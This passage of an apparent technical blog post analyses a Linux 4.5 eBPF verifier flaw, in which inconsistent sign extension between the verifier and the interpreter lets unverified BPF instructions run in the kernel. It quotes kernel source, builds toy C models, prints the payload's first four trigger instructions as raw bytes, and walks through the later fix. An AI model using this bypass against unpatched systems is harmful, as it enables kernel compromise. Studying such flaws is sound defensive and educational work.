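- `regs[insn->dst_reg].type == CONST_IMM`: recall that the first instruction set the type of R9 to `CONST_IMM`. Satisfied.
- `regs[insn->dst_reg].imm == insn->imm`: both sides are signed 32-bit integers (this is the crucial point), and 0xffffffff == 0xffffffff, since both are -1. Satisfied.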

All four conditions hold and the opcode is `BPF_JNE`, so the function returns immediately. It never pushes the other possible branch onto the stack.
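Here is a simplified model of this decision. It assumes the only state that matters is the two fields the 4.5 verifier checks here: `type` and a 32-bit `int imm`. The `toy_*` names are hypothetical, and the rest of the verifier state is left out.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical reduced model of the 4.5 struct reg_state. */
enum toy_reg_type { TOY_NOT_INIT, TOY_CONST_IMM };

struct toy_reg_state {
    enum toy_reg_type type;
    int imm;                 /* same width and signedness as reg_state.imm */
};

/* Models the BPF_MOV | BPF_K path of check_alu_op(): record the constant. */
static void toy_check_mov_k(struct toy_reg_state *reg, int32_t insn_imm)
{
    reg->type = TOY_CONST_IMM;
    reg->imm = insn_imm;
}

/* Models the shortcut in check_cond_jmp_op() for BPF_JNE | BPF_K:
 * true means "the jump can never be taken", so no branch is pushed.
 * Both operands are 32-bit signed, so 0xffffffff compares equal to -1. */
static bool toy_jne_k_is_pruned(const struct toy_reg_state *reg, int32_t insn_imm)
{
    return reg->type == TOY_CONST_IMM && reg->imm == insn_imm;
}
```

Feeding the first two payload instructions through it (`toy_check_mov_k(&r9, -1)`, then `toy_jne_k_is_pruned(&r9, -1)`) returns true: the jump target is never queued for verification.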

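Again nothing looks wrong. check_cond_jmp_op returns and do_check moves on to the next instruction; since no jump is taken, verification continues sequentially.

Next is the third instruction, `\xb7\x00\x00\x00\x00\x00\x00\x00`. There is nothing special about it. Like the first instruction it moves an immediate into a register, but this time as a 64-bit move (`BPF_ALU64 | BPF_MOV | BPF_K`) that sets R0 to 0. It exists only so that the fourth instruction, a `BPF_EXIT`, passes verification. The `BPF_EXIT` branch of do_check begins with this check:

```c
} else if (opcode == BPF_EXIT) {
    if (BPF_SRC(insn->code) != BPF_K ||
        insn->imm != 0 ||
        insn->src_reg != BPF_REG_0 ||
        insn->dst_reg != BPF_REG_0) {
        verbose("BPF_EXIT uses reserved fields\n");
        return -EINVAL;
    }
```

This check only validates the reserved fields of the exit instruction itself. It requires the instruction's `dst_reg` field to be 0, which says nothing about the value in R0.

What actually requires R0 to be set is the call that follows, `check_reg_arg(regs, BPF_REG_0, SRC_OP)` (see the full branch below). R0 is the program's return value. The verifier rejects the program if R0 has never been written, which is its state when the program starts. Through `is_pointer_value`, it also rejects the program if R0 holds a pointer.

That is why the third instruction sets BPF_REG_0 to 0.

With the third instruction done, we reach the fourth, `\x95\x00\x00\x00\x00\x00\x00\x00`. It returns R0, which here amounts to `exit(0)`.

After computing the class and opcode, this instruction enters the following branch: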

```c
} else if (opcode == BPF_EXIT) {
    if (BPF_SRC(insn->code) != BPF_K ||
        insn->imm != 0 ||
        insn->src_reg != BPF_REG_0 ||
        insn->dst_reg != BPF_REG_0) {
        verbose("BPF_EXIT uses reserved fields\n");
        return -EINVAL;
    }

    err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
    if (err)
        return err;

    if (is_pointer_value(env, BPF_REG_0)) {
        verbose("R0 leaks addr as return value\n");
        return -EACCES;
    }

process_bpf_exit:
    insn_idx = pop_stack(env, &prev_insn_idx);
    if (insn_idx < 0) {
        break;
    } else {
        do_print_state = true;
        continue;
    }
}
```

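After the safety checks, pop_stack is called to see whether any pending branch is still waiting to be verified. If none is, the loop ends, verification finishes, and the BPF program is accepted for loading.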

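That is exactly our case: no branch is pending. In other words, do_check examined only the first four instructions and concluded that nothing after them could ever execute. The large, illegal remainder of the payload was therefore never verified.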
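The walk that do_check performs is a depth-first search with an explicit stack of pending branches. The toy below models it under heavy simplifications:

- a made-up five-opcode instruction set;
- constants tracked as 32-bit ints, as in 4.5;
- no branch-specific refinement and no state pruning;
- a fixed step budget in place of the real instruction limit.

It records which instructions the walk examines. All names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical mini instruction set covering the start of the payload;
 * TOY_OTHER stands for any instruction whose checks are not modeled. */
enum toy_op { TOY_MOV32_K, TOY_MOV64_K, TOY_JNE_K, TOY_EXIT, TOY_OTHER };

struct toy_insn {
    enum toy_op op;
    int dst;          /* register number 0..10 */
    int16_t off;      /* jump offset */
    int32_t imm;      /* immediate */
};

/* Per-path state: current index plus known constants (32-bit, as in 4.5). */
struct toy_state {
    int idx;
    bool known[11];
    int32_t val[11];
};

#define TOY_MAX_PENDING 64
#define TOY_MAX_STEPS   32768

/* Returns 0 when every explored path ends in an exit, -1 otherwise.
 * visited[i] is set for each instruction the walk examines. */
static int toy_do_check(const struct toy_insn *prog, int cnt, bool visited[])
{
    struct toy_state pending[TOY_MAX_PENDING];
    struct toy_state cur = { 0 };
    int sp = 0;

    for (int i = 0; i < cnt; i++)
        visited[i] = false;

    for (int steps = 0; steps < TOY_MAX_STEPS; steps++) {
        if (cur.idx < 0 || cur.idx >= cnt)
            return -1;                     /* fell off the program */
        const struct toy_insn *in = &prog[cur.idx];
        visited[cur.idx] = true;

        switch (in->op) {
        case TOY_MOV32_K:
        case TOY_MOV64_K:                  /* 4.5 records both as an int */
            cur.known[in->dst] = true;
            cur.val[in->dst] = in->imm;
            cur.idx++;
            break;
        case TOY_JNE_K:
            if (!(cur.known[in->dst] && cur.val[in->dst] == in->imm)) {
                /* outcome unknown: queue the jump target, like push_stack() */
                if (sp == TOY_MAX_PENDING)
                    return -1;
                pending[sp] = cur;
                pending[sp].idx = cur.idx + in->off + 1;
                sp++;
            }
            cur.idx++;                     /* continue on the fall-through */
            break;
        case TOY_EXIT:
            if (sp == 0)
                return 0;                  /* like pop_stack() returning < 0 */
            cur = pending[--sp];
            break;
        default:
            cur.idx++;
            break;
        }
    }
    return -1;                             /* step budget exhausted */
}
```

With the payload's first four instructions followed by stand-ins for the rest, only indices 0 to 3 are marked visited. Changing the JNE immediate to any value other than -1 makes the walk reach the remainder too.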

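If real execution followed exactly the same path as the simulated execution, there would be no vulnerability: the payload would only ever run its first four instructions. The problem lies precisely where the two differ.

Now let's look at real execution. The following code is from kernel/bpf/core.c: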

```c
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
    u64 stack[MAX_BPF_STACK / sizeof(u64)];
    u64 regs[MAX_BPF_REG], tmp;
    static const void *jumptable[256] = {
        [0 ... 255] = &&default_label,
        [BPF_ALU | BPF_ADD | BPF_X] = &&ALU_ADD_X,
        [BPF_ALU | BPF_ADD | BPF_K] = &&ALU_ADD_K,
        [BPF_ALU | BPF_SUB | BPF_X] = &&ALU_SUB_X,
        [BPF_ALU | BPF_SUB | BPF_K] = &&ALU_SUB_K,
        [BPF_ALU | BPF_AND | BPF_X] = &&ALU_AND_X,
        [BPF_ALU | BPF_AND | BPF_K] = &&ALU_AND_K,
        [BPF_ALU | BPF_OR | BPF_X] = &&ALU_OR_X,
        [BPF_ALU | BPF_OR | BPF_K] = &&ALU_OR_K,
        [BPF_ALU | BPF_LSH | BPF_X] = &&ALU_LSH_X,
        [BPF_ALU | BPF_LSH | BPF_K] = &&ALU_LSH_K,
        [BPF_ALU | BPF_RSH | BPF_X] = &&ALU_RSH_X,
        [BPF_ALU | BPF_RSH | BPF_K] = &&ALU_RSH_K,
        [BPF_ALU | BPF_XOR | BPF_X] = &&ALU_XOR_X,
        [BPF_ALU | BPF_XOR | BPF_K] = &&ALU_XOR_K,
        [BPF_ALU | BPF_MUL | BPF_X] = &&ALU_MUL_X,
        [BPF_ALU | BPF_MUL | BPF_K] = &&ALU_MUL_K,
        [BPF_ALU | BPF_MOV | BPF_X] = &&ALU_MOV_X,
        [BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K,
        [BPF_ALU | BPF_DIV | BPF_X] = &&ALU_DIV_X,
        [BPF_ALU | BPF_DIV | BPF_K] = &&ALU_DIV_K,
        [BPF_ALU | BPF_MOD | BPF_X] = &&ALU_MOD_X,
        [BPF_ALU | BPF_MOD | BPF_K] = &&ALU_MOD_K,
        [BPF_ALU | BPF_NEG] = &&ALU_NEG,
        [BPF_ALU | BPF_END | BPF_TO_BE] = &&ALU_END_TO_BE,
        [BPF_ALU | BPF_END | BPF_TO_LE] = &&ALU_END_TO_LE,
        [BPF_ALU64 | BPF_ADD | BPF_X] = &&ALU64_ADD_X,
        [BPF_ALU64 | BPF_ADD | BPF_K] = &&ALU64_ADD_K,
        [BPF_ALU64 | BPF_SUB | BPF_X] = &&ALU64_SUB_X,
        [BPF_ALU64 | BPF_SUB | BPF_K] = &&ALU64_SUB_K,
        [BPF_ALU64 | BPF_AND | BPF_X] = &&ALU64_AND_X,
        [BPF_ALU64 | BPF_AND | BPF_K] = &&ALU64_AND_K,
        [BPF_ALU64 | BPF_OR | BPF_X] = &&ALU64_OR_X,
        [BPF_ALU64 | BPF_OR | BPF_K] = &&ALU64_OR_K,
        [BPF_ALU64 | BPF_LSH | BPF_X] = &&ALU64_LSH_X,
        [BPF_ALU64 | BPF_LSH | BPF_K] = &&ALU64_LSH_K,
        [BPF_ALU64 | BPF_RSH | BPF_X] = &&ALU64_RSH_X,
        [BPF_ALU64 | BPF_RSH | BPF_K] = &&ALU64_RSH_K,
        [BPF_ALU64 | BPF_XOR | BPF_X] = &&ALU64_XOR_X,
        [BPF_ALU64 | BPF_XOR | BPF_K] = &&ALU64_XOR_K,
        [BPF_ALU64 | BPF_MUL | BPF_X] = &&ALU64_MUL_X,
        [BPF_ALU64 | BPF_MUL | BPF_K] = &&ALU64_MUL_K,
        [BPF_ALU64 | BPF_MOV | BPF_X] = &&ALU64_MOV_X,
        [BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K,
        [BPF_ALU64 | BPF_ARSH | BPF_X] = &&ALU64_ARSH_X,
        [BPF_ALU64 | BPF_ARSH | BPF_K] = &&ALU64_ARSH_K,
        [BPF_ALU64 | BPF_DIV | BPF_X] = &&ALU64_DIV_X,
        [BPF_ALU64 | BPF_DIV | BPF_K] = &&ALU64_DIV_K,
        [BPF_ALU64 | BPF_MOD | BPF_X] = &&ALU64_MOD_X,
        [BPF_ALU64 | BPF_MOD | BPF_K] = &&ALU64_MOD_K,
        [BPF_ALU64 | BPF_NEG] = &&ALU64_NEG,
        [BPF_JMP | BPF_CALL] = &&JMP_CALL,
        [BPF_JMP | BPF_CALL | BPF_X] = &&JMP_TAIL_CALL,
        [BPF_JMP | BPF_JA] = &&JMP_JA,
        [BPF_JMP | BPF_JEQ | BPF_X] = &&JMP_JEQ_X,
        [BPF_JMP | BPF_JEQ | BPF_K] = &&JMP_JEQ_K,
        [BPF_JMP | BPF_JNE | BPF_X] = &&JMP_JNE_X,
        [BPF_JMP | BPF_JNE | BPF_K] = &&JMP_JNE_K,
        [BPF_JMP | BPF_JGT | BPF_X] = &&JMP_JGT_X,
        [BPF_JMP | BPF_JGT | BPF_K] = &&JMP_JGT_K,
        [BPF_JMP | BPF_JGE | BPF_X] = &&JMP_JGE_X,
        [BPF_JMP | BPF_JGE | BPF_K] = &&JMP_JGE_K,
        [BPF_JMP | BPF_JSGT | BPF_X] = &&JMP_JSGT_X,
        [BPF_JMP | BPF_JSGT | BPF_K] = &&JMP_JSGT_K,
        [BPF_JMP | BPF_JSGE | BPF_X] = &&JMP_JSGE_X,
        [BPF_JMP | BPF_JSGE | BPF_K] = &&JMP_JSGE_K,
        [BPF_JMP | BPF_JSET | BPF_X] = &&JMP_JSET_X,
        [BPF_JMP | BPF_JSET | BPF_K] = &&JMP_JSET_K,
        [BPF_JMP | BPF_EXIT] = &&JMP_EXIT,
        [BPF_STX | BPF_MEM | BPF_B] = &&STX_MEM_B,
        [BPF_STX | BPF_MEM | BPF_H] = &&STX_MEM_H,
        [BPF_STX | BPF_MEM | BPF_W] = &&STX_MEM_W,
        [BPF_STX | BPF_MEM | BPF_DW] = &&STX_MEM_DW,
        [BPF_STX | BPF_XADD | BPF_W] = &&STX_XADD_W,
        [BPF_STX | BPF_XADD | BPF_DW] = &&STX_XADD_DW,
        [BPF_ST | BPF_MEM | BPF_B] = &&ST_MEM_B,
        [BPF_ST | BPF_MEM | BPF_H] = &&ST_MEM_H,
        [BPF_ST | BPF_MEM | BPF_W] = &&ST_MEM_W,
        [BPF_ST | BPF_MEM | BPF_DW] = &&ST_MEM_DW,
        [BPF_LDX | BPF_MEM | BPF_B] = &&LDX_MEM_B,
        [BPF_LDX | BPF_MEM | BPF_H] = &&LDX_MEM_H,
        [BPF_LDX | BPF_MEM | BPF_W] = &&LDX_MEM_W,
        [BPF_LDX | BPF_MEM | BPF_DW] = &&LDX_MEM_DW,
        [BPF_LD | BPF_ABS | BPF_W] = &&LD_ABS_W,
        [BPF_LD | BPF_ABS | BPF_H] = &&LD_ABS_H,
        [BPF_LD | BPF_ABS | BPF_B] = &&LD_ABS_B,
        [BPF_LD | BPF_IND | BPF_W] = &&LD_IND_W,
        [BPF_LD | BPF_IND | BPF_H] = &&LD_IND_H,
        [BPF_LD | BPF_IND | BPF_B] = &&LD_IND_B,
        [BPF_LD | BPF_IMM | BPF_DW] = &&LD_IMM_DW,
    };
    u32 tail_call_cnt = 0;
    void *ptr;
    int off;

#define CONT     ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

    FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
    ARG1 = (u64) (unsigned long) ctx;

select_insn:
    goto *jumptable[insn->code];

#define ALU(OPCODE, OP)                         \
    ALU64_##OPCODE##_X:                         \
        DST = DST OP SRC;                       \
        CONT;                                   \
    ALU_##OPCODE##_X:                           \
        DST = (u32) DST OP (u32) SRC;           \
        CONT;                                   \
    ALU64_##OPCODE##_K:                         \
        DST = DST OP IMM;                       \
        CONT;                                   \
    ALU_##OPCODE##_K:                           \
        DST = (u32) DST OP (u32) IMM;           \
        CONT;

    ALU(ADD,  +)
    ALU(SUB,  -)
    ALU(AND,  &)
    ALU(OR,   |)
    ALU(LSH, <<)
    ALU(RSH, >>)
    ALU(XOR,  ^)
    ALU(MUL,  *)
#undef ALU
    ALU_NEG:
        DST = (u32) -DST;
        CONT;
    ALU64_NEG:
        DST = -DST;
        CONT;
    ALU_MOV_X:
        DST = (u32) SRC;
        CONT;
    ALU_MOV_K:
        DST = (u32) IMM;      /* first payload instruction lands here */
        CONT;
    ALU64_MOV_X:
        DST = SRC;
        CONT;
    ALU64_MOV_K:
        DST = IMM;
        CONT;
    LD_IMM_DW:
        DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
        insn++;
        CONT;
    ALU64_ARSH_X:
        (*(s64 *) &DST) >>= SRC;
        CONT;
    ALU64_ARSH_K:
        (*(s64 *) &DST) >>= IMM;
        CONT;
    ALU64_MOD_X:
        if (unlikely(SRC == 0))
            return 0;
        div64_u64_rem(DST, SRC, &tmp);
        DST = tmp;
        CONT;
    ALU_MOD_X:
        if (unlikely(SRC == 0))
            return 0;
        tmp = (u32) DST;
        DST = do_div(tmp, (u32) SRC);
        CONT;
    ALU64_MOD_K:
        div64_u64_rem(DST, IMM, &tmp);
        DST = tmp;
        CONT;
    ALU_MOD_K:
        tmp = (u32) DST;
        DST = do_div(tmp, (u32) IMM);
        CONT;
    ALU64_DIV_X:
        if (unlikely(SRC == 0))
            return 0;
        DST = div64_u64(DST, SRC);
        CONT;
    ALU_DIV_X:
        if (unlikely(SRC == 0))
            return 0;
        tmp = (u32) DST;
        do_div(tmp, (u32) SRC);
        DST = (u32) tmp;
        CONT;
    ALU64_DIV_K:
        DST = div64_u64(DST, IMM);
        CONT;
    ALU_DIV_K:
        tmp = (u32) DST;
        do_div(tmp, (u32) IMM);
        DST = (u32) tmp;
        CONT;
    ALU_END_TO_BE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_be16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_be32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_be64(DST);
            break;
        }
        CONT;
    ALU_END_TO_LE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_le16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_le32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_le64(DST);
            break;
        }
        CONT;

    JMP_CALL:
        BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
                                               BPF_R4, BPF_R5);
        CONT;

    JMP_TAIL_CALL: {
        struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
        struct bpf_array *array = container_of(map, struct bpf_array, map);
        struct bpf_prog *prog;
        u64 index = BPF_R3;

        if (unlikely(index >= array->map.max_entries))
            goto out;

        if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
            goto out;

        tail_call_cnt++;

        prog = READ_ONCE(array->ptrs[index]);
        if (unlikely(!prog))
            goto out;

        insn = prog->insnsi;
        goto select_insn;
out:
        CONT;
    }
    JMP_JA:
        insn += insn->off;
        CONT;
    JMP_JEQ_X:
        if (DST == SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JEQ_K:
        if (DST == IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_X:
        if (DST != SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_K:
        if (DST != IMM) {     /* second payload instruction lands here */
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JGT_X:
        if (DST > SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JGT_K:
        if (DST > IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JGE_X:
        if (DST >= SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JGE_K:
        if (DST >= IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSGT_X:
        if (((s64) DST) > ((s64) SRC)) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSGT_K:
        if (((s64) DST) > ((s64) IMM)) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSGE_X:
        if (((s64) DST) >= ((s64) SRC)) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSGE_K:
        if (((s64) DST) >= ((s64) IMM)) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSET_X:
        if (DST & SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JSET_K:
        if (DST & IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_EXIT:
        return BPF_R0;

#define LDST(SIZEOP, SIZE)                                      \
    STX_MEM_##SIZEOP:                                           \
        *(SIZE *)(unsigned long) (DST + insn->off) = SRC;       \
        CONT;                                                   \
    ST_MEM_##SIZEOP:                                            \
        *(SIZE *)(unsigned long) (DST + insn->off) = IMM;       \
        CONT;                                                   \
    LDX_MEM_##SIZEOP:                                           \
        DST = *(SIZE *)(unsigned long) (SRC + insn->off);       \
        CONT;

    LDST(B,   u8)
    LDST(H,  u16)
    LDST(W,  u32)
    LDST(DW, u64)
#undef LDST
    STX_XADD_W:
        atomic_add((u32) SRC, (atomic_t *)(unsigned long)
                   (DST + insn->off));
        CONT;
    STX_XADD_DW:
        atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
                     (DST + insn->off));
        CONT;
    LD_ABS_W:
        off = IMM;
load_word:
        ptr = bpf_load_pointer((struct sk_buff *) (unsigned long) CTX, off, 4, &tmp);
        if (likely(ptr != NULL)) {
            BPF_R0 = get_unaligned_be32(ptr);
            CONT;
        }
        return 0;
    LD_ABS_H:
        off = IMM;
load_half:
        ptr = bpf_load_pointer((struct sk_buff *) (unsigned long) CTX, off, 2, &tmp);
        if (likely(ptr != NULL)) {
            BPF_R0 = get_unaligned_be16(ptr);
            CONT;
        }
        return 0;
    LD_ABS_B:
        off = IMM;
load_byte:
        ptr = bpf_load_pointer((struct sk_buff *) (unsigned long) CTX, off, 1, &tmp);
        if (likely(ptr != NULL)) {
            BPF_R0 = *(u8 *)ptr;
            CONT;
        }
        return 0;
    LD_IND_W:
        off = IMM + SRC;
        goto load_word;
    LD_IND_H:
        off = IMM + SRC;
        goto load_half;
    LD_IND_B:
        off = IMM + SRC;
        goto load_byte;

    default_label:
        WARN_RATELIMIT(1, "unknown opcode %02x\n", insn->code);
        return 0;
}
```

Again, start with the first instruction, `\xb4\x09\x00\x00\xff\xff\xff\xff`.

At run time, this instruction dispatches to the following label:

```c
ALU_MOV_K:
    DST = (u32) IMM;
    CONT;
```

This assigns the immediate (IMM) to the register.

Pay particular attention to the types of DST and IMM:

```c
#define DST regs[insn->dst_reg]
#define IMM insn->imm
/* ... */
u64 regs[MAX_BPF_REG], tmp;
```

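DST is an unsigned 64-bit integer, while IMM is a signed 32-bit integer.

The statement `DST = (u32) IMM;` first casts IMM to an unsigned 32-bit integer and then assigns it to DST.

Because DST is an unsigned 64-bit integer, the value has to be widened to 64 bits for the assignment. The value is unsigned at this point, so it is zero-extended: the original 0xffffffff becomes 0x00000000ffffffff in DST.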
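The zero extension can be checked in plain C. The functions below are hypothetical stand-ins for the `ALU_MOV_K` and `ALU64_MOV_K` handlers. They model DST as a `uint64_t` and IMM as an `int32_t`. The 64-bit variant is included for contrast: it converts the immediate directly, which sign-extends it.

```c
#include <stdint.h>

/* Stand-in for ALU_MOV_K: DST = (u32) IMM. The cast yields a 32-bit
 * unsigned value, which is zero-extended when stored into the u64 DST. */
static uint64_t interp_alu_mov_k(int32_t imm)
{
    uint64_t dst = (uint32_t)imm;
    return dst;
}

/* Stand-in for ALU64_MOV_K: DST = IMM. Converting a negative s32 straight
 * to u64 keeps its value modulo 2^64, i.e. it is sign-extended. */
static uint64_t interp_alu64_mov_k(int32_t imm)
{
    uint64_t dst = (uint64_t)imm;
    return dst;
}
```

With the payload's immediate, `interp_alu_mov_k(-1)` gives 0x00000000ffffffff and `interp_alu64_mov_k(-1)` gives 0xffffffffffffffff.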

Next, the second instruction, `\x55\x09\x02\x00\xff\xff\xff\xff`,

dispatches to this label:

```c
JMP_JNE_K:
    if (DST != IMM) {
        insn += insn->off;
        CONT_JMP;
    }
    CONT;
```

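This checks whether DST differs from IMM. In the simulated execution these two values were equal. The verifier therefore assumed the jump is never taken: execution would continue with the third and fourth instructions and then exit.

In real execution, however, something goes wrong.

Again, look at the types of DST and IMM.

DST is still an unsigned 64-bit integer, and IMM is still a signed 32-bit integer.

To evaluate `DST != IMM`, note that DST holds 0x00000000ffffffff. IMM is a signed 32-bit integer, so it must first be converted to 64 bits before the comparison.

How is IMM extended?

Since IMM is signed, 0xffffffff (-1) is sign-extended to 0xffffffffffffffff.

Because 0x00000000ffffffff != 0xffffffffffffffff, the jump is taken. The interpreter then executes the rest of our payload, which should never have run and which the simulated execution never checked.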
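The same comparison in standalone C follows. It models DST as a `uint64_t` and IMM as an `int32_t`, as in `__bpf_prog_run`; `interp_jne_k_taken` is a hypothetical helper name. The usual arithmetic conversions turn the signed immediate into a 64-bit unsigned value before `!=` is evaluated.

```c
#include <stdbool.h>
#include <stdint.h>

/* Stand-in for JMP_JNE_K: if (DST != IMM) jump. DST is a u64 register,
 * IMM the s32 insn->imm; for the comparison IMM is converted to u64,
 * which maps -1 to 0xffffffffffffffff. */
static bool interp_jne_k_taken(uint64_t dst, int32_t imm)
{
    return dst != (uint64_t)imm;
}
```

Calling `interp_jne_k_taken(0x00000000ffffffffULL, -1)`, the state left behind by `ALU_MOV_K`, returns true, so the jump the verifier considered impossible is taken.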

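By now the principle should be clear. The two sides treat the value differently:

- The verifier tracks the constant as a signed 32-bit value, so it sees 0xffffffff == 0xffffffff.
- The interpreter zero-extends the 32-bit mov into a 64-bit register, but sign-extends the immediate in the 64-bit comparison.

This inconsistent sign extension makes the verifier's simulated execution and the interpreter's real execution disagree. BPF instructions that never passed the safety checks thus bypass the verifier and are loaded and executed by the kernel.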







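The screenshots above come from a debugging session.

Executing the comparison:

This is exactly where the vulnerability triggers: the interpreter is about to compare DST with IMM.

DST is the value at `$rbp+$rax*8-0x278`, which is 0x00000000ffffffff.

IMM is the value in the rdx register, as shown in the screenshot,

which is 0xffffffffffffffff.

You can also see the instruction `<__bpf_prog_run+2265> movsxd rdx, DWORD PTR [rbx+0x4]`. It loads `insn->imm`, which sits at offset 4 of struct bpf_insn, and sign-extends it to 64 bits.

Because the two values differ, execution enters a branch it should never reach and runs BPF instructions that were never verified.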

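## The fix

This vulnerability has long been fixed in mainline Linux. Let's look at how Linux 4.15 handles it.

The main fix is in check_alu_op. Many of the verifier's data structures have been substantially reworked since 4.5, so I'll only summarize them.

In the vulnerable version, the assignment performed by our first instruction is handled by: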

```c
} else {
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
}
```

In the new version, it is handled by:

```c
} else {
    regs[insn->dst_reg].type = SCALAR_VALUE;
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
        __mark_reg_known(regs + insn->dst_reg, insn->imm);
    } else {
        __mark_reg_known(regs + insn->dst_reg, (u32)insn->imm);
    }
}
```

First, the implementation of `__mark_reg_known`:

```c
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
    reg->id = 0;
    reg->var_off = tnum_const(imm);
    reg->smin_value = (s64)imm;
    reg->smax_value = (s64)imm;
    reg->umin_value = imm;
    reg->umax_value = imm;
}
```

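So in the new version, our first instruction leads to the call `__mark_reg_known(regs + insn->dst_reg, (u32)insn->imm);`.

The immediate is first cast to an unsigned 32-bit integer and then passed to __mark_reg_known.

Note that the corresponding parameter of __mark_reg_known is an unsigned 64-bit integer. The cast value is therefore zero-extended from 32 to 64 bits: 0xffffffff -> 0x00000000ffffffff.

Next, the implementation of tnum_const: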

```c
#define TNUM(_v, _m)    (struct tnum){.value = _v, .mask = _m}
/* A completely unknown value */
const struct tnum tnum_unknown = { .value = 0, .mask = -1 };

struct tnum tnum_const(u64 value)
{
    return TNUM(value, 0);
}
```

This function simply stores 0x00000000ffffffff in `reg->var_off.value`. The mask is 0, meaning every bit is known.
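Here is a minimal sketch of this path in the fixed verifier. It keeps only the `value`/`mask` pair of `struct tnum`. `model_mov_k` is a hypothetical helper that mimics the two `__mark_reg_known` calls in the fixed check_alu_op quoted above.

```c
#include <stdint.h>

/* Reduced struct tnum: bits set in mask are unknown, value holds the
 * known bits. A fully known constant has mask == 0. */
struct tnum {
    uint64_t value;
    uint64_t mask;
};

static struct tnum tnum_const(uint64_t value)
{
    struct tnum t = { value, 0 };
    return t;
}

/* Hypothetical helper mirroring the fixed BPF_MOV | BPF_K path:
 * ALU64 passes insn->imm as is (s32 -> u64, sign-extended);
 * 32-bit ALU casts to u32 first (so the u64 parameter is zero-extended). */
static struct tnum model_mov_k(int is_alu64, int32_t imm)
{
    if (is_alu64)
        return tnum_const((uint64_t)imm);
    return tnum_const((uint32_t)imm);
}
```

For the payload's `BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)`, `model_mov_k(0, -1)` records 0x00000000ffffffff. This now matches what the interpreter's `ALU_MOV_K` stores.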

Now let's see what happens to the second instruction.

In the old version, the "always/never taken" case is detected by:

```c
if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == CONST_IMM &&
    regs[insn->dst_reg].imm == insn->imm) {
    if (opcode == BPF_JEQ) {
        *insn_idx += insn->off;
        return 0;
    } else {
        return 0;
    }
}

other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
    return -EFAULT;
/* ... */
```

In the new version, it is detected by:

```c
if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    dst_reg->type == SCALAR_VALUE &&
    tnum_equals_const(dst_reg->var_off, insn->imm)) {
    if (opcode == BPF_JEQ) {
        *insn_idx += insn->off;
        return 0;
    } else {
        return 0;
    }
}
```

The key difference is the fourth condition, so let's look at tnum_equals_const:

```c
static inline bool tnum_is_const(struct tnum a)
{
    return !a.mask;
}

static inline bool tnum_equals_const(struct tnum a, u64 b)
{
    return tnum_is_const(a) && a.value == b;
}
```

When insn->imm, a signed 32-bit value, is passed to tnum_equals_const, it is converted to an unsigned 64-bit integer and therefore sign-extended: 0xffffffff -> 0xffffffffffffffff.

From the analysis above, `reg->var_off.value` is 0x00000000ffffffff at this point. `return tnum_is_const(a) && a.value == b;` therefore becomes `return 1 && 0x00000000ffffffff == 0xffffffffffffffff;`, which evaluates to `return 0`.

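In other words, the condition is false. The old version returned early at this point; the new version keeps going. It pushes the other branch and verifies the instructions that may execute there, so our malicious BPF instructions are no longer loaded unchecked.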

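## Afterword

I haven't yet covered the part of the payload that actually exploits the bug. I'll write that up in a follow-up post, together with some of the important data structures in the Linux kernel.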